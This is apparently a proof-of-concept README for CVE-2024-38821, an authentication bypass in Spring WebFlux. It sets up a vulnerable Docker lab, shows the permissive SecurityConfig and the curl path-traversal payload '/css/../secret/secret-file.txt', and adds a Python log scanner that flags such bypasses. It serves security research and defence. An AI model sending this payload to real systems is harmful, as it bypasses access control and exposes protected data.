# CVE-2024-38821: Proof of Concept (PoC): Authentication Bypass in Spring Framework
This is a proof of concept for the [CVE-2024-38821](https://spring.io/security/cve-2024-38821) vulnerability.
## Execution Steps
1. Build the Docker image (Spring Boot 3.3.4, based on Spring Framework 6.1.13)
```
cd vuln
docker build -t cve-2024-38821-poc .
```
2. Run the container and expose port 8080 to the host machine
```
docker run -d -p 8080:8080 --name cve-2024-38821-poc cve-2024-38821-poc
```
3. Run the following command to execute the PoC and confirm the vulnerability
```
curl -v --path-as-is "http://localhost:8080/secret/secret-file.txt" # Expected: 302 response (login required)
curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt" # Expected: 200 response (bypassed authentication)
```
If the attack is successful, the response will display: `This is a secret file.`
## Explanation
1. Create `SecurityConfig.java` to configure access permissions:
- Allow unauthenticated access to paths under `/css/`.
- Require authentication for paths under `/secret/`.
```java
package com.example.demo;

import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.reactive.EnableWebFluxSecurity;
import org.springframework.security.config.web.server.ServerHttpSecurity;
import org.springframework.security.web.server.SecurityWebFilterChain;

@Configuration
@EnableWebFluxSecurity
public class SecurityConfig {
    @Bean
    public SecurityWebFilterChain securityWebFilterChain(ServerHttpSecurity http) {
        return http
            .authorizeExchange(exchange -> exchange
                .pathMatchers("/css/**", "/").permitAll() // Static resources and the top page do not require authentication
                .pathMatchers("/secret/**").authenticated() // Authentication is required for the "secret" path
                .anyExchange().authenticated() // Authentication is required for all other paths
            )
            .formLogin().and() // Enable form-based authentication
            .build();
    }
}
```
2. Create the following payload. Because the path starts with `/css/`, it matches the permitted pattern; because it does not start with `/secret/`, it never matches the pattern that requires authentication:
- Path: `/css/../secret/secret-file.txt`
3. Use the following `curl` command to execute the PoC and verify whether the attack is successful:
```
# Note: The --path-as-is option is required to send the request without URL normalization.
curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt"
```
If the attack is successful, the response will display: `This is a secret file.`
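The root cause the steps above describe is a disagreement between two path views: the authorization rules are evaluated against the raw request path (`/css/../secret/secret-file.txt` starts with `/css/`, so it is permitted), while the static resource handler serves the normalized path (`/secret/secret-file.txt`). The following Python script is an added example and is not part of the PoC repository or of Spring. It copies the rule table from the page's `SecurityConfig`, matches it with a simplified stand-in for Spring's path patterns (an assumption, not Spring's own matcher), approximates the resolver's normalization with `posixpath.normpath`, and runs the resulting mismatch check over a constructed access log so a defender can spot requests that were authorized under one path but served under another.

```python
import posixpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Authorization rules as declared in the page's SecurityConfig, in order.
# Like Spring Security's authorizeExchange(), the first matching rule wins.
RULES: List[Tuple[str, str]] = [
    ("/css/**", "permitAll"),
    ("/", "permitAll"),
    ("/secret/**", "authenticated"),
    ("/**", "authenticated"),  # anyExchange().authenticated()
]


def pattern_to_regex(pattern: str) -> "re.Pattern[str]":
    """Translate an Ant-style pattern into a regex.

    Simplified stand-in for Spring's PathPattern (assumption): '/**' matches
    zero or more trailing segments, '*' matches within one segment.
    """
    out, i = "", 0
    while i < len(pattern):
        if pattern.startswith("/**", i):
            out += "(?:/.*)?"
            i += 3
        elif pattern[i] == "*":
            out += "[^/]*"
            i += 1
        else:
            out += re.escape(pattern[i])
            i += 1
    return re.compile("^" + out + "$")


def decide(path: str) -> str:
    """Return the decision of the first rule whose pattern matches `path`."""
    for pattern, decision in RULES:
        if pattern_to_regex(pattern).match(path):
            return decision
    return "authenticated"  # unreachable with the '/**' catch-all; kept as a safe default


def normalize(path: str) -> str:
    """Collapse '.' and '..' segments the way a resource resolver would
    (posixpath.normpath; an absolute path cannot climb above '/')."""
    return posixpath.normpath("/" + path.lstrip("/"))


@dataclass
class Mismatch:
    raw_path: str
    normalized_path: str
    raw_decision: str
    normalized_decision: str


def audit(path: str) -> Optional[Mismatch]:
    """Flag a request whose raw path gets a different authorization decision
    from the path the resource handler will actually serve."""
    norm = normalize(path)
    raw_decision, norm_decision = decide(path), decide(norm)
    if norm == path or raw_decision == norm_decision:
        return None
    return Mismatch(path, norm, raw_decision, norm_decision)


# Constructed sample access log in common log format (assumption: the app
# writes such a log; Spring Boot's reactive stack does not by default).
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2024:12:00:00 +0000] "GET /css/style.css HTTP/1.1" 200 0
127.0.0.1 - - [10/Oct/2024:12:00:01 +0000] "GET /secret/secret-file.txt HTTP/1.1" 302 0
127.0.0.1 - - [10/Oct/2024:12:00:02 +0000] "GET /css/../secret/secret-file.txt HTTP/1.1" 200 22
127.0.0.1 - - [10/Oct/2024:12:00:03 +0000] "GET /css/./style.css?v=1 HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def scan_log(log: str) -> List[Mismatch]:
    """Run audit() over every request line; the query string is dropped
    because only the path takes part in pattern matching."""
    hits: List[Mismatch] = []
    for line in log.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group("target").split("?", 1)[0]
        found = audit(path)
        if found:
            hits.append(found)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit.raw_path} -> {hit.normalized_path}: "
              f"{hit.raw_decision} vs {hit.normalized_decision}")
```

Only the third log line is reported: its raw path is permitted by `/css/**` but its normalized path falls under `/secret/**`. The fourth line also contains a dot segment, yet both views resolve to a permitted path, so the check stays quiet; the signal is a changed decision, not the mere presence of `..`. On a patched Spring Framework (6.1.14 and later, per the linked advisory) the resource handler no longer serves such traversing paths, but the log check remains useful for finding attempts made before the upgrade.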
## Disclaimer
This PoC is provided for educational and security research purposes. Before using this in a real system, ensure the vulnerability has been fixed and you have proper authorization. The author takes no responsibility for any misuse of this code.
File snapshot
```
[4.0K] /data/pocs/8dec030e406cf8f4363c05ddd879344ccad6f7e7
├── [1.0K] LICENSE
├── [2.6K] README.md
├── [4.0K] safe
│   ├── [ 580] build.gradle
│   ├── [ 512] Dockerfile
│   └── [4.0K] src
│       └── [4.0K] main
│           ├── [4.0K] java
│           │   └── [4.0K] com
│           │       └── [4.0K] example
│           │           └── [4.0K] demo
│           │               ├── [ 315] DemoApplication.java
│           │               └── [ 981] SecurityConfig.java
│           └── [4.0K] resources
│               ├── [4.0K] static
│               │   ├── [4.0K] css
│               │   │   └── [   0] style.css
│               │   └── [4.0K] secret
│               │       └── [  22] secret-file.txt
│               └── [4.0K] templates
│                   ├── [ 123] index.html
│                   └── [ 597] login.html
└── [4.0K] vuln
    ├── [ 580] build.gradle
    ├── [ 512] Dockerfile
    └── [4.0K] src
        └── [4.0K] main
            ├── [4.0K] java
            │   └── [4.0K] com
            │       └── [4.0K] example
            │           └── [4.0K] demo
            │               ├── [ 315] DemoApplication.java
            │               └── [ 981] SecurityConfig.java
            └── [4.0K] resources
                ├── [4.0K] static
                │   ├── [4.0K] css
                │   │   └── [   0] style.css
                │   └── [4.0K] secret
                │       └── [  22] secret-file.txt
                └── [4.0K] templates
                    ├── [ 123] index.html
                    └── [ 597] login.html

24 directories, 18 files
```